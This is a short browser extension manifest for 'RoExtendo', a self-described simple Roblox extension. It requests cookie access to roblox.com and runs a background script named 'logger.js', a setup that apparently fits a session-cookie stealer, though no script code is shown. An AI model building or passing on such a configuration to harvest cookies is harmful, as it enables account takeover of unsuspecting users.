{
	"name": "RoExtendo",
	"version": "1.0",
	"manifest_version": 3,
	"description": "Simple Extension For Roblox.",
	"action": {
		"default_icon": "icon.png"
	},
	"permissions": ["cookies"],
	"host_permissions": ["https://www.roblox.com/"],
	"background": {
		"service_worker": "logger.js"
	},
	"icons": {
		"16": "icon.png",
		"48": "icon.png",
		"128": "icon.png"
	}
}
